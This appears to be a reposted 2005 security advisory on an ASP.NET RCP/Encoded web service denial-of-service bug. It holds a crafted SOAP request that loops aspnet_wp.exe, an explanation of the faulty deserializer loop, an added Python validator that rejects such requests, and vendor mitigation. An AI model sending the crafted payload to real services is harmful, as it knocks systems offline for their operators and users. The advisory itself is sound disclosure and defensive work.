Sunday, July 24, 2005

[NT] ASP.NET RCP/Encoded Web Service DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

ASP.NET RCP/Encoded Web Service DoS
------------------------------------------------------------------------

SUMMARY

By sending a custom SOAP message to an RCP/Encoded web method, attackers
can cause a denial of service in Microsoft's ASP.NET environment.

DETAILS

By sending a custom SOAP message to an RCP/Encoded web method that accepts
an array (or any object derived from IList, like StringCollection or
ArrayList), attackers can cause the aspnet_wp.exe process to consume 100%
of the system resources.

If the system is a bit faster, more than one request may be needed to
cause the DoS condition.

To replicate the issue, attackers can send a request to the
Test(int[] someList) web method defined inside the AspCrashWebService
project (refer to AspCrashWebService.zip distributed with this document).
A normal SOAP message calling this method with a single element of 0 would
look like:

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
<Item>0</Item>
</soapenc:Array>
</soap:Body>
</soap:Envelope>

If attackers replace the <soapenc:Array> definition with the complex type
defined in the demo ASPCrashWebService.Service1 WSDL definition
(ArrayOfInt), they trigger the problem in aspnet_wp.exe.

The new request would look like:

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfInt>
</soap:Body>
</soap:Envelope>

The error is caused by an infinite loop inside
System.Xml.Serialization.XmlSerializationReader.ReadReferencedElements().
The method can be translated to the following code:

protected void ReadReferencedElements()
{
    string V_0;
    r.MoveToContent();
    // Walks every multi-ref element that follows the call wrapper. The loop
    // assumes ReadReferencingElement() always consumes the current element;
    // for an element it cannot deserialize the reader is left where it was.
    while (r.NodeType != XmlNodeType.EndElement && r.NodeType != XmlNodeType.None)
    {
        ReadReferencingElement(null, null, true, out V_0);
        r.MoveToContent();
    }
    DoFixups();
    HandleUnreferencedObjects();
}

The problem is that after the call to ReadReferencingElement() the reader
has not advanced: r.NodeType is still XmlNodeType.Element, so the while
loop never terminates.
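As an added defensive example (not part of the SPI Labs advisory and not Microsoft's code), the following Python check models what a gate in front of an RCP/Encoded endpoint could enforce before a request reaches the XmlSerializer: every top-level element after the call wrapper in soap:Body must be a soapenc:Array carrying an id and a soapenc:arrayType, and every href in the Body must resolve to one of them. The two sample messages are constructed here to mirror the normal and the crafted request above; the function and constant names (check_multiref, build_request, NORMAL_REQUEST, CRAFTED_REQUEST) are assumptions of this example.

```python
# Added example (not from the advisory): a pre-dispatch sanity check for
# RCP/Encoded SOAP requests, modelled on the two messages in the advisory.
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
TNS = "http://tempuri.org/"          # service namespace used by the demo

BODY_TAG = "{%s}Body" % SOAP_ENV
ARRAY_TAG = "{%s}Array" % SOAP_ENC
ARRAY_TYPE_ATTR = "{%s}arrayType" % SOAP_ENC


def check_multiref(envelope_xml, allowed_tags=(ARRAY_TAG,)):
    """Return (accepted, reason) for one SOAP envelope.

    The serializer walks every top-level element after the call wrapper and
    expects each one to be a multi-ref target it knows how to consume. This
    check rejects, before dispatch, anything that does not match that shape:
    an unexpected element type, a missing or duplicate id, a soapenc:Array
    without arrayType, or an href that does not resolve to a listed element.
    """
    try:
        root = ET.fromstring(envelope_xml)
    except ET.ParseError as exc:
        return False, "malformed XML: %s" % exc

    body = root.find(BODY_TAG)
    if body is None:
        return False, "no soap:Body"
    children = list(body)
    if not children:
        return False, "empty soap:Body"

    # children[0] is the RPC call wrapper (tns:Test); everything after it
    # must be a multi-ref element of an allowed type carrying a unique id.
    targets = {}
    for extra in children[1:]:
        if extra.tag not in allowed_tags:
            return False, "unexpected top-level element %s" % extra.tag
        ident = extra.get("id")
        if ident is None:
            return False, "multi-ref element %s has no id" % extra.tag
        if ident in targets:
            return False, "duplicate id %r" % ident
        if extra.tag == ARRAY_TAG and extra.get(ARRAY_TYPE_ATTR) is None:
            return False, "soapenc:Array %r has no arrayType" % ident
        targets[ident] = extra

    # every href anywhere in the Body must be a local reference to one of them
    for elem in body.iter():
        href = elem.get("href")
        if href is None:
            continue
        if not href.startswith("#") or href[1:] not in targets:
            return False, "href %r does not resolve to a multi-ref element" % href
    return True, "ok"


# --- constructed sample messages (mirroring the advisory's two requests) ---
_ENVELOPE = (
    '<soap:Envelope xmlns:soap="{env}" xmlns:soapenc="{enc}" '
    'xmlns:tns="{tns}" xmlns:xsd="http://www.w3.org/2001/XMLSchema">'
    '<soap:Body soap:encodingStyle="{enc}">{body}</soap:Body>'
    '</soap:Envelope>'
)


def build_request(body_xml):
    """Wrap body content in the demo service's envelope (constructed sample)."""
    return _ENVELOPE.format(env=SOAP_ENV, enc=SOAP_ENC, tns=TNS, body=body_xml)


CALL = '<tns:Test><someList href="#id1"/></tns:Test>'
NORMAL_REQUEST = build_request(
    CALL + '<soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">'
           '<Item>0</Item></soapenc:Array>')
CRAFTED_REQUEST = build_request(
    CALL + '<tns:ArrayOfInt><Item>0</Item></tns:ArrayOfInt>')

if __name__ == "__main__":
    for name, msg in (("normal", NORMAL_REQUEST), ("crafted", CRAFTED_REQUEST)):
        print("%-8s -> %s" % (name, check_multiref(msg)))
```

The check is calibrated for methods whose reference-typed parameters are arrays, as with Test(int[] someList); a method that also takes multi-ref structs would pass their element tags in allowed_tags. The rejection reason is worth logging, since a burst of "unexpected top-level element" rejections against an RCP/Encoded endpoint is exactly the traffic pattern this advisory describes. This is a perimeter mitigation only; the vendor guidance below (document/literal, restarting aspnet_wp.exe in the interim) still applies to the serializer itself.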

Vendor Status:
RCP/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming "Whidbey" release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation will
resume without problems.

ADDITIONAL INFORMATION

The information has been provided by SPI Labs (spilabs@spidynamics.com).
The original article can be found at:
http://www.spidynamics.com/spilabs/advisories/aspRCP.html
